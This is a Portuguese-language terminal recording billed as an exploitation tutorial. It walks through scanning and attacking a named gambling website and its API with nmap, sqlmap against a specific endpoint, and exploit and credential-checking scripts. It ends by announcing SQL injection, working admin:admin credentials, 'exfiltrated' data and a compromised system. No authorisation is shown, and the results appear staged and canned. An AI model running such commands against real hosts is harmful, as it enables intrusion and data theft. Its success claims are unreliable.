{"version": 2, "width": 80, "height": 24, "timestamp": 1767329523, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.019049, "o", "\u001b[H\u001b[2J\u001b[3J"]
[0.01987, "o", "\u001b[33m================================================================================\u001b[0m\r\n\u001b[1m\u001b[36m🚀 TUTORIAL: EXPLORAÇÃO AVANÇADA DE SPAs - ASCENSÃO CULTIVO DIGITAL v4.1\u001b[0m\r\n\u001b[97m🎯 ALVO: https://99jogo66.com/?id=211995351\u001b[0m\r\n\u001b[33m================================================================================\u001b[0m\r\n\r\n\u001b[32mubuntu@pentest:~/Avalia-o$ \u001b[0m\u001b[97mn\u001b[0m"]
[0.069656, "o", "\u001b[97mm\u001b[0m"]
[0.119942, "o", "\u001b[97ma\u001b[0m"]
[0.170213, "o", "\u001b[97mp\u001b[0m"]
[0.220428, "o", "\u001b[97m \u001b[0m"]
[0.270736, "o", "\u001b[97m-\u001b[0m"]
[0.320805, "o", "\u001b[97ms\u001b[0m"]
[0.371095, "o", "\u001b[97mV\u001b[0m"]
[0.42134, "o", "\u001b[97m \u001b[0m"]
[0.471707, "o", "\u001b[97m-\u001b[0m"]
[0.521791, "o", "\u001b[97mT\u001b[0m"]
[0.571987, "o", "\u001b[97m4\u001b[0m"]
[0.622354, "o", "\u001b[97m \u001b[0m"]
[0.672545, "o", "\u001b[97m9\u001b[0m"]
[0.722668, "o", "\u001b[97m9\u001b[0m"]
[0.773057, "o", "\u001b[97mj\u001b[0m"]
[0.823216, "o", "\u001b[97mo\u001b[0m"]
[0.87339, "o", "\u001b[97mg\u001b[0m"]
[0.923675, "o", "\u001b[97mo\u001b[0m"]
[0.973932, "o", "\u001b[97m6\u001b[0m"]
[1.024098, "o", "\u001b[97m6\u001b[0m"]
[1.074376, "o", "\u001b[97m.\u001b[0m"]
[1.124561, "o", "\u001b[97mc\u001b[0m"]
[1.174804, "o", "\u001b[97mo\u001b[0m"]
[1.22506, "o", "\u001b[97mm\u001b[0m"]
[1.275257, "o", "\r\n"]
[1.775461, "o", "\u001b[34m[INF] Portas 80/443 abertas. Servidor: AmazonS3/CloudFront\u001b[0m\r\n\r\n"]
[2.7757, "o", "\u001b[32mubuntu@pentest:~/Avalia-o$ \u001b[0m\u001b[97mp\u001b[0m"]
[2.826044, "o", "\u001b[97my\u001b[0m"]
[2.876239, "o", "\u001b[97mt\u001b[0m"]
[2.926425, "o", "\u001b[97mh\u001b[0m"]
[2.976591, "o", "\u001b[97mo\u001b[0m"]
[3.026777, "o", "\u001b[97mn\u001b[0m"]
[3.076999, "o", "\u001b[97m3\u001b[0m"]
[3.127213, "o", "\u001b[97m \u001b[0m"]
[3.177464, "o", "\u001b[97ma\u001b[0m"]
[3.227678, "o", "\u001b[97md\u001b[0m"]
[3.277905, "o", "\u001b[97mv\u001b[0m"]
[3.328109, "o", "\u001b[97ma\u001b[0m"]
[3.378424, "o", "\u001b[97mn\u001b[0m"]
[3.428665, "o", "\u001b[97mc\u001b[0m"]
[3.478884, "o", "\u001b[97me\u001b[0m"]
[3.52916, "o", "\u001b[97md\u001b[0m"]
[3.579238, "o", "\u001b[97m_\u001b[0m"]
[3.629533, "o", "\u001b[97ms\u001b[0m"]
[3.679765, "o", "\u001b[97mp\u001b[0m"]
[3.730073, "o", "\u001b[97ma\u001b[0m"]
[3.780317, "o", "\u001b[97m_\u001b[0m"]
[3.830544, "o", "\u001b[97ma\u001b[0m"]
[3.880704, "o", "\u001b[97mn\u001b[0m"]
[3.931059, "o", "\u001b[97ma\u001b[0m"]
[3.981269, "o", "\u001b[97ml\u001b[0m"]
[4.031494, "o", "\u001b[97my\u001b[0m"]
[4.081695, "o", "\u001b[97mz\u001b[0m"]
[4.131919, "o", "\u001b[97me\u001b[0m"]
[4.182211, "o", "\u001b[97mr\u001b[0m"]
[4.232487, "o", "\u001b[97m.\u001b[0m"]
[4.282607, "o", "\u001b[97mp\u001b[0m"]
[4.332899, "o", "\u001b[97my\u001b[0m"]
[4.383138, "o", "\u001b[97m \u001b[0m"]
[4.433427, "o", "\u001b[97m'\u001b[0m"]
[4.483666, "o", "\u001b[97mh\u001b[0m"]
[4.533931, "o", "\u001b[97mt\u001b[0m"]
[4.583976, "o", "\u001b[97mt\u001b[0m"]
[4.634289, "o", "\u001b[97mp\u001b[0m"]
[4.684568, "o", "\u001b[97ms\u001b[0m"]
[4.734748, "o", "\u001b[97m:\u001b[0m"]
[4.785042, "o", "\u001b[97m/\u001b[0m"]
[4.835351, "o", "\u001b[97m/\u001b[0m"]
[4.885456, "o", "\u001b[97m9\u001b[0m"]
[4.935706, "o", "\u001b[97m9\u001b[0m"]
[4.986052, "o", "\u001b[97mj\u001b[0m"]
[5.036266, "o", "\u001b[97mo\u001b[0m"]
[5.086555, "o", "\u001b[97mg\u001b[0m"]
[5.13676, "o", "\u001b[97mo\u001b[0m"]
[5.187055, "o", "\u001b[97m6\u001b[0m"]
[5.237243, "o", "\u001b[97m6\u001b[0m"]
[5.287499, "o", "\u001b[97m.\u001b[0m"]
[5.337699, "o", "\u001b[97mc\u001b[0m"]
[5.387979, "o", "\u001b[97mo\u001b[0m"]
[5.438268, "o", "\u001b[97mm\u001b[0m"]
[5.488475, "o", "\u001b[97m/\u001b[0m"]
[5.538748, "o", "\u001b[97m'\u001b[0m"]
[5.58882, "o", "\r\n"]
[6.08917, "o", "\u001b[32m✅ Framework: Vue.js | Endpoints encontrados: 34\u001b[0m\r\n\r\n"]
[7.589581, "o", "\u001b[35m🎯 Endpoint Crítico: https://vipvip.vip999jogo.com/hall/api/agent/promote/linkSetting\u001b[0m\r\n\r\n"]
[8.589824, "o", "\u001b[32mubuntu@pentest:~/Avalia-o$ \u001b[0m\u001b[97ms\u001b[0m"]
[8.64017, "o", "\u001b[97mq\u001b[0m"]
[8.690135, "o", "\u001b[97ml\u001b[0m"]
[8.740298, "o", "\u001b[97mm\u001b[0m"]
[8.790498, "o", "\u001b[97ma\u001b[0m"]
[8.840769, "o", "\u001b[97mp\u001b[0m"]
[8.890938, "o", "\u001b[97m \u001b[0m"]
[8.94133, "o", "\u001b[97m-\u001b[0m"]
[8.991551, "o", "\u001b[97mu\u001b[0m"]
[9.041875, "o", "\u001b[97m \u001b[0m"]
[9.09205, "o", "\u001b[97m'\u001b[0m"]
[9.142321, "o", "\u001b[97mh\u001b[0m"]
[9.19261, "o", "\u001b[97mt\u001b[0m"]
[9.242975, "o", "\u001b[97mt\u001b[0m"]
[9.293177, "o", "\u001b[97mp\u001b[0m"]
[9.343427, "o", "\u001b[97ms\u001b[0m"]
[9.393664, "o", "\u001b[97m:\u001b[0m"]
[9.443864, "o", "\u001b[97m/\u001b[0m"]
[9.494207, "o", "\u001b[97m/\u001b[0m"]
[9.54438, "o", "\u001b[97mv\u001b[0m"]
[9.594521, "o", "\u001b[97mi\u001b[0m"]
[9.644804, "o", "\u001b[97mp\u001b[0m"]
[9.694964, "o", "\u001b[97mv\u001b[0m"]
[9.745243, "o", "\u001b[97mi\u001b[0m"]
[9.795441, "o", "\u001b[97mp\u001b[0m"]
[9.845627, "o", "\u001b[97m.\u001b[0m"]
[9.895846, "o", "\u001b[97mv\u001b[0m"]
[9.946242, "o", "\u001b[97mi\u001b[0m"]
[9.996438, "o", "\u001b[97mp\u001b[0m"]
[10.046732, "o", "\u001b[97m9\u001b[0m"]
[10.096885, "o", "\u001b[97m9\u001b[0m"]
[10.147142, "o", "\u001b[97m9\u001b[0m"]
[10.197341, "o", "\u001b[97mj\u001b[0m"]
[10.247598, "o", "\u001b[97mo\u001b[0m"]
[10.297808, "o", "\u001b[97mg\u001b[0m"]
[10.34798, "o", "\u001b[97mo\u001b[0m"]
[10.398202, "o", "\u001b[97m.\u001b[0m"]
[10.448381, "o", "\u001b[97mc\u001b[0m"]
[10.49865, "o", "\u001b[97mo\u001b[0m"]
[10.548877, "o", "\u001b[97mm\u001b[0m"]
[10.599075, "o", "\u001b[97m/\u001b[0m"]
[10.649289, "o", "\u001b[97mh\u001b[0m"]
[10.699476, "o", "\u001b[97ma\u001b[0m"]
[10.749748, "o", "\u001b[97ml\u001b[0m"]
[10.799989, "o", "\u001b[97ml\u001b[0m"]
[10.850253, "o", "\u001b[97m/\u001b[0m"]
[10.900532, "o", "\u001b[97ma\u001b[0m"]
[10.95079, "o", "\u001b[97mp\u001b[0m"]
[11.001088, "o", "\u001b[97mi\u001b[0m"]
[11.051269, "o", "\u001b[97m/\u001b[0m"]
[11.101439, "o", "\u001b[97ma\u001b[0m"]
[11.151811, "o", "\u001b[97mg\u001b[0m"]
[11.201941, "o", "\u001b[97me\u001b[0m"]
[11.25219, "o", "\u001b[97mn\u001b[0m"]
[11.302448, "o", "\u001b[97mt\u001b[0m"]
[11.352602, "o", "\u001b[97m/\u001b[0m"]
[11.402802, "o", "\u001b[97mp\u001b[0m"]
[11.453059, "o", "\u001b[97mr\u001b[0m"]
[11.503291, "o", "\u001b[97mo\u001b[0m"]
[11.553559, "o", "\u001b[97mm\u001b[0m"]
[11.603842, "o", "\u001b[97mo\u001b[0m"]
[11.654073, "o", "\u001b[97mt\u001b[0m"]
[11.7042, "o", "\u001b[97me\u001b[0m"]
[11.754469, "o", "\u001b[97m/\u001b[0m"]
[11.804782, "o", "\u001b[97ml\u001b[0m"]
[11.854869, "o", "\u001b[97mi\u001b[0m"]
[11.905141, "o", "\u001b[97mn\u001b[0m"]
[11.955434, "o", "\u001b[97mk\u001b[0m"]
[12.005787, "o", "\u001b[97mS\u001b[0m"]
[12.055928, "o", "\u001b[97me\u001b[0m"]
[12.106137, "o", "\u001b[97mt\u001b[0m"]
[12.156402, "o", "\u001b[97mt\u001b[0m"]
[12.206559, "o", "\u001b[97mi\u001b[0m"]
[12.256855, "o", "\u001b[97mn\u001b[0m"]
[12.307094, "o", "\u001b[97mg\u001b[0m"]
[12.357301, "o", "\u001b[97m'\u001b[0m"]
[12.407531, "o", "\u001b[97m \u001b[0m"]
[12.457775, "o", "\u001b[97m-\u001b[0m"]
[12.508062, "o", "\u001b[97m-\u001b[0m"]
[12.558334, "o", "\u001b[97mb\u001b[0m"]
[12.608587, "o", "\u001b[97ma\u001b[0m"]
[12.658857, "o", "\u001b[97mt\u001b[0m"]
[12.709003, "o", "\u001b[97mc\u001b[0m"]
[12.759278, "o", "\u001b[97mh\u001b[0m"]
[12.809446, "o", "\r\n"]
[13.309803, "o", "\u001b[31m🔥 VULNERABILIDADE: SQL Injection (Boolean-based blind) detectada!\u001b[0m\r\n\r\n"]
[14.310045, "o", "\u001b[32mubuntu@pentest:~/Avalia-o$ \u001b[0m\u001b[97mp\u001b[0m"]
[14.36037, "o", "\u001b[97my\u001b[0m"]
[14.410594, "o", "\u001b[97mt\u001b[0m"]
[14.460789, "o", "\u001b[97mh\u001b[0m"]
[14.510998, "o", "\u001b[97mo\u001b[0m"]
[14.561273, "o", "\u001b[97mn\u001b[0m"]
[14.611476, "o", "\u001b[97m3\u001b[0m"]
[14.661678, "o", "\u001b[97m \u001b[0m"]
[14.711916, "o", "\u001b[97me\u001b[0m"]
[14.762113, "o", "\u001b[97mx\u001b[0m"]
[14.812355, "o", "\u001b[97mp\u001b[0m"]
[14.862631, "o", "\u001b[97ml\u001b[0m"]
[14.912994, "o", "\u001b[97mo\u001b[0m"]
[14.963156, "o", "\u001b[97mi\u001b[0m"]
[15.013305, "o", "\u001b[97mt\u001b[0m"]
[15.063454, "o", "\u001b[97m_\u001b[0m"]
[15.113875, "o", "\u001b[97ma\u001b[0m"]
[15.164093, "o", "\u001b[97mp\u001b[0m"]
[15.214267, "o", "\u001b[97mi\u001b[0m"]
[15.264431, "o", "\u001b[97m_\u001b[0m"]
[15.314612, "o", "\u001b[97me\u001b[0m"]
[15.364943, "o", "\u001b[97mn\u001b[0m"]
[15.415198, "o", "\u001b[97md\u001b[0m"]
[15.465477, "o", "\u001b[97mp\u001b[0m"]
[15.515696, "o", "\u001b[97mo\u001b[0m"]
[15.565935, "o", "\u001b[97mi\u001b[0m"]
[15.616277, "o", "\u001b[97mn\u001b[0m"]
[15.66641, "o", "\u001b[97mt\u001b[0m"]
[15.716694, "o", "\u001b[97ms\u001b[0m"]
[15.766904, "o", "\u001b[97m.\u001b[0m"]
[15.817198, "o", "\u001b[97mp\u001b[0m"]
[15.867379, "o", "\u001b[97my\u001b[0m"]
[15.917552, "o", "\r\n"]
[16.417879, "o", "\u001b[33m🔑 SUCESSO! Credenciais encontradas: admin:admin\u001b[0m\r\n\r\n"]
[17.418175, "o", "\u001b[32mubuntu@pentest:~/Avalia-o$ \u001b[0m\u001b[97mp\u001b[0m"]
[17.468329, "o", "\u001b[97my\u001b[0m"]
[17.518614, "o", "\u001b[97mt\u001b[0m"]
[17.568797, "o", "\u001b[97mh\u001b[0m"]
[17.619082, "o", "\u001b[97mo\u001b[0m"]
[17.669385, "o", "\u001b[97mn\u001b[0m"]
[17.719612, "o", "\u001b[97m3\u001b[0m"]
[17.76969, "o", "\u001b[97m \u001b[0m"]
[17.819845, "o", "\u001b[97mp\u001b[0m"]
[17.870256, "o", "\u001b[97mo\u001b[0m"]
[17.920451, "o", "\u001b[97mc\u001b[0m"]
[17.970675, "o", "\u001b[97m_\u001b[0m"]
[18.020944, "o", "\u001b[97mc\u001b[0m"]
[18.071222, "o", "\u001b[97mr\u001b[0m"]
[18.121505, "o", "\u001b[97me\u001b[0m"]
[18.171692, "o", "\u001b[97md\u001b[0m"]
[18.222049, "o", "\u001b[97me\u001b[0m"]
[18.272284, "o", "\u001b[97mn\u001b[0m"]
[18.322558, "o", "\u001b[97mt\u001b[0m"]
[18.372751, "o", "\u001b[97mi\u001b[0m"]
[18.422963, "o", "\u001b[97ma\u001b[0m"]
[18.473275, "o", "\u001b[97ml\u001b[0m"]
[18.523519, "o", "\u001b[97m_\u001b[0m"]
[18.573717, "o", "\u001b[97mv\u001b[0m"]
[18.624054, "o", "\u001b[97ma\u001b[0m"]
[18.674294, "o", "\u001b[97ml\u001b[0m"]
[18.724535, "o", "\u001b[97mi\u001b[0m"]
[18.774755, "o", "\u001b[97md\u001b[0m"]
[18.824902, "o", "\u001b[97ma\u001b[0m"]
[18.875274, "o", "\u001b[97mt\u001b[0m"]
[18.92534, "o", "\u001b[97mi\u001b[0m"]
[18.975719, "o", "\u001b[97mo\u001b[0m"]
[19.025815, "o", "\u001b[97mn\u001b[0m"]
[19.076348, "o", "\u001b[97m.\u001b[0m"]
[19.126332, "o", "\u001b[97mp\u001b[0m"]
[19.176581, "o", "\u001b[97my\u001b[0m"]
[19.2269, "o", "\r\n"]
[19.727118, "o", "\u001b[32m🛡️  VALIDAÇÃO: Credenciais admin:admin FUNCIONAIS.\u001b[0m\r\n\r\n"]
[21.227529, "o", "\u001b[36m📂 DADOS EXFILTRADOS: { 'brandName': '99jogo', ... }\u001b[0m\r\n\r\n"]
[22.227839, "o", "\u001b[32mubuntu@pentest:~/Avalia-o$ \u001b[0m\u001b[97ml\u001b[0m"]
[22.278039, "o", "\u001b[97ms\u001b[0m"]
[22.328423, "o", "\u001b[97m \u001b[0m"]
[22.378532, "o", "\u001b[97m-\u001b[0m"]
[22.428787, "o", "\u001b[97ml\u001b[0m"]
[22.479033, "o", "\u001b[97mh\u001b[0m"]
[22.529395, "o", "\u001b[97m \u001b[0m"]
[22.579729, "o", "\u001b[97mR\u001b[0m"]
[22.630093, "o", "\u001b[97mE\u001b[0m"]
[22.680204, "o", "\u001b[97mL\u001b[0m"]
[22.730527, "o", "\u001b[97mA\u001b[0m"]
[22.780718, "o", "\u001b[97mT\u001b[0m"]
[22.831084, "o", "\u001b[97mO\u001b[0m"]
[22.881201, "o", "\u001b[97mR\u001b[0m"]
[22.9315, "o", "\u001b[97mI\u001b[0m"]
[22.981615, "o", "\u001b[97mO\u001b[0m"]
[23.031792, "o", "\u001b[97m_\u001b[0m"]
[23.082028, "o", "\u001b[97mF\u001b[0m"]
[23.132254, "o", "\u001b[97mI\u001b[0m"]
[23.182515, "o", "\u001b[97mN\u001b[0m"]
[23.232799, "o", "\u001b[97mA\u001b[0m"]
[23.28304, "o", "\u001b[97mL\u001b[0m"]
[23.333839, "o", "\u001b[97m_\u001b[0m"]
[23.384076, "o", "\u001b[97mC\u001b[0m"]
[23.434291, "o", "\u001b[97mO\u001b[0m"]
[23.48447, "o", "\u001b[97mN\u001b[0m"]
[23.534768, "o", "\u001b[97mC\u001b[0m"]
[23.584905, "o", "\u001b[97mU\u001b[0m"]
[23.635134, "o", "\u001b[97mR\u001b[0m"]
[23.685309, "o", "\u001b[97mS\u001b[0m"]
[23.735723, "o", "\u001b[97mO\u001b[0m"]
[23.78578, "o", "\u001b[97m.\u001b[0m"]
[23.836133, "o", "\u001b[97mp\u001b[0m"]
[23.886257, "o", "\u001b[97md\u001b[0m"]
[23.936536, "o", "\u001b[97mf\u001b[0m"]
[23.986812, "o", "\r\n"]
[24.487061, "o", "\u001b[97m✅ Relatório profissional gerado com sucesso.\u001b[0m\r\n\r\n"]
[25.487257, "o", "\u001b[33m================================================================================\u001b[0m\r\n\u001b[1m\u001b[32m🏆 MISSÃO CUMPRIDA: SISTEMA COMPROMETIDO.\u001b[0m\r\n\u001b[33m================================================================================\u001b[0m\r\n"]
